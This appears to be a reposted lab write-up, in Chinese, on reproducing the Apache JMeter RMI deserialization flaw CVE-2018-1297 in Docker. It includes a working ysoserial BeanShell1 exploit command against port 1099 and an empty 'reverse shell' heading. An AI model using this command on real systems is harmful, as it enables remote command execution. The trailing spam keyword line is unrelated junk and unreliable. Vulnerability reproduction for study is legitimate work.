<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    Jmeter RMI 反序列化命令執行漏洞(CVE-2018-1297)

    Path jmeter/CVE-2018-1297

    Apache JMeter是美國阿帕奇(Apache)軟件基金會的一套使用Java語言編寫的用于壓力測試和性能測試的開源軟件。其2.x版本和3.x版本中存在反序列化漏洞,攻擊者可以利用該漏洞在目標服務器上執行任意命令。

    漏洞環境

    運行漏洞環境:

    docker-compose up -d

    運行完成后,將啟動一個RMI服務并監聽1099端口。

    漏洞復現

    直接使用ysoserial即可進行利用:

    java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.RMIRegistryExploit your-ip 1099 BeanShell1 'touch /tmp/success'

    我們使用的是BeanShell1這條利用鏈。使用docker-compose exec jmeter bash進入容器,可見/tmp/success已成功創建:

    反彈shell:

    本文章首發在 網安wangan.com 網站上。

    上一篇 下一篇
    討論數量: 0
    只看當前版本


    暫無話題~
    亚洲 欧美 自拍 唯美 另类